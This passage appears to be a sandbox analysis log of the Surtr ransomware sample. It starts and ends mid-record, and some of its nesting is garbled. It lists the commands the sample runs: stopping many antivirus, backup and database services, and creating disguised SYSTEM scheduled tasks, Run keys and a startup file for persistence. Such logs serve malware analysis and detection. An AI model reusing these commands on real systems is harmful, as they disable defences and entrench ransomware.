  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:4144
- - C:\Windows\system32\attrib.exe
    attrib +R /S "C:\ProgramData\Service"
    3⤵
    - Views/modifies file attributes
    PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
  2⤵
  PID:3584
- - C:\Windows\system32\net.exe
    net stop "IISAdmin"
    3⤵
    PID:3652
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "IISAdmin"
      4⤵
      PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
  2⤵
  PID:4312
- - C:\Windows\system32\net.exe
    net stop "IMAP4Svc"
    3⤵
    PID:960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "IMAP4Svc"
      4⤵
      PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
  2⤵
  PID:1812
- - C:\Windows\system32\net.exe
    net stop "macmnsvc"
    3⤵
    PID:968
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "macmnsvc"
      4⤵
      PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:4744
- - C:\Windows\system32\attrib.exe
    attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
    3⤵
    - Views/modifies file attributes
    PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "masvc"
  2⤵
  PID:4936
- - C:\Windows\system32\net.exe
    net stop "masvc"
    3⤵
    PID:4948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "masvc"
      4⤵
      PID:1964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:3600
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:2428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MBAMService"
  2⤵
  PID:4036
- - C:\Windows\system32\net.exe
    net stop "MBAMService"
    3⤵
    PID:5112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MBAMService"
      4⤵
      PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
  2⤵
  PID:4708
- - C:\Windows\system32\net.exe
    net stop "MBEndpointAgent"
    3⤵
    PID:5000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MBEndpointAgent"
      4⤵
      PID:720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:4032
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
  2⤵
  PID:1948
- - C:\Windows\system32\net.exe
    net stop "McAfeeEngineService"
    3⤵
    PID:3592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeEngineService"
      4⤵
      PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  PID:2864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1632
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
  2⤵
  PID:208
- - C:\Windows\system32\net.exe
    net stop "McAfeeFramework"
    3⤵
    PID:4540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeFramework"
      4⤵
      PID:288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4308
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
  2⤵
  PID:3980
- - C:\Windows\system32\net.exe
    net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:1956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1936
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4660
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:1532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McShield"
  2⤵
  PID:3952
- - C:\Windows\system32\net.exe
    net stop "McShield"
    3⤵
    PID:220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McShield"
      4⤵
      PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mfemms"
  2⤵
  PID:1444
- - C:\Windows\system32\net.exe
    net stop "mfemms"
    3⤵
    PID:1900
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mfemms"
      4⤵
      PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mfevtp"
  2⤵
  PID:3260
- - C:\Windows\system32\net.exe
    net stop "mfevtp"
    3⤵
    PID:1260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mfevtp"
      4⤵
      PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MMS"
  2⤵
  PID:3568
- - C:\Windows\system32\net.exe
    net stop "MMS"
    3⤵
    PID:2348
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MMS"
      4⤵
      PID:4804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
  2⤵
  PID:2936
- - C:\Windows\system32\net.exe
    net stop "mozyprobackup"
    3⤵
    PID:3420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mozyprobackup"
      4⤵
      PID:4188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
  2⤵
  PID:1668
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer"
    3⤵
    PID:1504
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer"
      4⤵
      PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
  2⤵
  PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
  2⤵
  PID:4120
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer110"
    3⤵
    PID:4852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer110"
      4⤵
      PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
  2⤵
  PID:2620
- - C:\Windows\system32\net.exe
    net stop "MSExchangeES"
    3⤵
    PID:4176
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeES"
      4⤵
      PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
  2⤵
  PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
  2⤵
  PID:3380
- - C:\Windows\system32\net.exe
    net stop "MSExchangeMGMT"
    3⤵
    - Drops startup file
    PID:4720
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeMGMT"
      4⤵
      PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
  2⤵
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
  2⤵
  PID:1452
- - C:\Windows\system32\net.exe
    net stop "MSExchangeSA"
    3⤵
    PID:1828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeSA"
      4⤵
      PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
  2⤵
  PID:1292
- - C:\Windows\system32\net.exe
    net stop "MSExchangeSRS"
    3⤵
    PID:416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeSRS"
      4⤵
      PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
  2⤵
  PID:1604
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$SQL_2008"
    3⤵
    PID:3860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
      4⤵
      PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
  2⤵
  PID:1100
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:4368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
  2⤵
  PID:4072
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$TPS"
    3⤵
    PID:1132
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$TPS"
      4⤵
      PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
  2⤵
  PID:872
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$TPSAMA"
    3⤵
    PID:4944
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
      4⤵
      PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
  2⤵
  PID:1144
- - C:\Windows\system32\net.exe
    net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:2540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
      4⤵
      PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
  2⤵
  PID:3132
- - C:\Windows\system32\net.exe
    net stop "MSSQL$ECWDB2"
    3⤵
    PID:4580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
      4⤵
      PID:3732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
  2⤵
  PID:4452
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PRACTICEMGT"
    3⤵
    PID:5092
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
      4⤵
      PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
  2⤵
  PID:4212
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:4060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
      4⤵
      PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
  2⤵
  PID:3052
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:4992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
      4⤵
      PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
  2⤵
  PID:1268
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:2400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
      4⤵
      PID:876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
  2⤵
  PID:4752
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:4684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
      4⤵
      PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
  2⤵
  PID:4592
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SQL_2008"
    3⤵
    PID:1560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
      4⤵
      PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
  2⤵
  PID:4780
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SYSTEM_BGC"
    3⤵
    PID:3640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
  2⤵
  PID:4692
- - C:\Windows\system32\net.exe
    net stop "MSSQL$TPS"
    3⤵
    PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$TPS"
      4⤵
      PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
  2⤵
  PID:1844
- - C:\Windows\system32\net.exe
    net stop "MSSQL$TPSAMA"
    3⤵
    PID:1400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
      4⤵
      PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:2480
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
  2⤵
  PID:4784
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2012"
    3⤵
    PID:268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
  2⤵
  - Adds Run key to start application
  PID:1660
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher"
    3⤵
    PID:4512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher"
      4⤵
      PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
  2⤵
  PID:2316
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
  2⤵
  PID:4504
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:1008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
  2⤵
  PID:4248
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:3808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
      4⤵
      PID:4664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
  2⤵
  PID:1488
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
      4⤵
      PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
  2⤵
  PID:1228
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
  2⤵
  PID:2116
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:3336
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
  2⤵
  PID:3436
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:3572
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:2152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
  2⤵
  PID:3224
- - C:\Windows\system32\net.exe
    net stop "MSSQLSERVER"
    3⤵
    PID:3412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLSERVER"
      4⤵
      PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
  2⤵
  PID:3900
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerADHelper100"
    3⤵
    PID:3872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
      4⤵
      PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
  2⤵
  PID:2032
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerOLAPService"
    3⤵
    PID:1740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
      4⤵
      PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MySQL80"
  2⤵
  PID:4080
- - C:\Windows\system32\net.exe
    net stop "MySQL80"
    3⤵
    PID:2020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MySQL80"
      4⤵
      PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MySQL57"
  2⤵
  PID:4612
- - C:\Windows\system32\net.exe
    net stop "MySQL57"
    3⤵
    PID:3152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MySQL57"
      4⤵
      PID:2560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
  2⤵
  PID:2988
- - C:\Windows\system32\net.exe
    net stop "OracleClientCache80"
    3⤵
    PID:2624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "OracleClientCache80"
      4⤵
      PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
  2⤵
  PID:4904
- - C:\Windows\system32\net.exe
    net stop "PDVFSService"
    3⤵
    PID:1988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "PDVFSService"
      4⤵
      PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
  2⤵
  PID:2016
- - C:\Windows\system32\net.exe
    net stop "POP3Svc"
    3⤵
    PID:3804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer"
  2⤵
  PID:2344
- - C:\Windows\system32\net.exe
    net stop "ReportServer"
    3⤵
    PID:2984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer"
      4⤵
      PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
  2⤵
  PID:1348
- - C:\Windows\system32\net.exe
    net stop "ReportServer$SQL_2008"
    3⤵
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
  2⤵
  PID:1156
- - C:\Windows\system32\net.exe
    net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:1456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
  2⤵
  PID:752
- - C:\Windows\system32\net.exe
    net stop "ReportServer$TPS"
    3⤵
    PID:2004
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$TPS"
      4⤵
      PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
  2⤵
  PID:2436
- - C:\Windows\system32\net.exe
    net stop "ReportServer$TPSAMA"
    3⤵
    PID:3028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
      4⤵
      PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "RESvc"
  2⤵
  PID:3196
- - C:\Windows\system32\net.exe
    net stop "RESvc"
    3⤵
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "sacsvr"
  2⤵
  PID:3488
- - C:\Windows\system32\net.exe
    net stop "sacsvr"
    3⤵
    PID:4712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "sacsvr"
      4⤵
      PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SamSs"
  2⤵
  PID:444
- - C:\Windows\system32\net.exe
    net stop "SamSs"
    3⤵
    PID:5116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SamSs"
      4⤵
      PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
  2⤵
  PID:5092
- - C:\Windows\system32\net.exe
    net stop "SAVAdminService"
    3⤵
    PID:4452
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SAVAdminService"
      4⤵
      PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SAVService"
  2⤵
  PID:448
- - C:\Windows\system32\net.exe
    net stop "SAVService"
    3⤵
    PID:3524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SAVService"
      4⤵
      PID:3368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Smcinst"
  2⤵
  PID:4748
- - C:\Windows\system32\net.exe
    net stop "Smcinst"
    3⤵
    PID:536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Smcinst"
      4⤵
      PID:4596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SmcService"
  2⤵
  PID:616
- - C:\Windows\system32\net.exe
    net stop "SmcService"
    3⤵
    PID:2408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SmcService"
      4⤵
      PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
  2⤵
  PID:1676
- - C:\Windows\system32\net.exe
    net stop "SMTPSvc"
    3⤵
    PID:712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SMTPSvc"
      4⤵
      PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SNAC"
  2⤵
  PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SntpService"
  2⤵
  PID:4020
- - C:\Windows\system32\net.exe
    net stop "SntpService"
    3⤵
    PID:4152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SntpService"
      4⤵
      PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "sophossps"
  2⤵
  PID:4760
- - C:\Windows\system32\net.exe
    net stop "sophossps"
    3⤵
    PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "sophossps"
      4⤵
      PID:4692
    - - C:\Windows\system32\net.exe
        
        net stop "wbengine"
        5⤵
        
        PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wbengine"
      4⤵
      PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
  2⤵
  PID:2128
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:1400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
      4⤵
      PID:1844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
  2⤵
  PID:1124
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$ECWDB2"
    3⤵
    PID:288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
      4⤵
      PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
  2⤵
  PID:992
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:1252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:1272
    - - C:\Windows\system32\net.exe
        
        net stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:1252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
  2⤵
  PID:3588
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:1688
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:3464
    - - C:\Windows\system32\net.exe
        
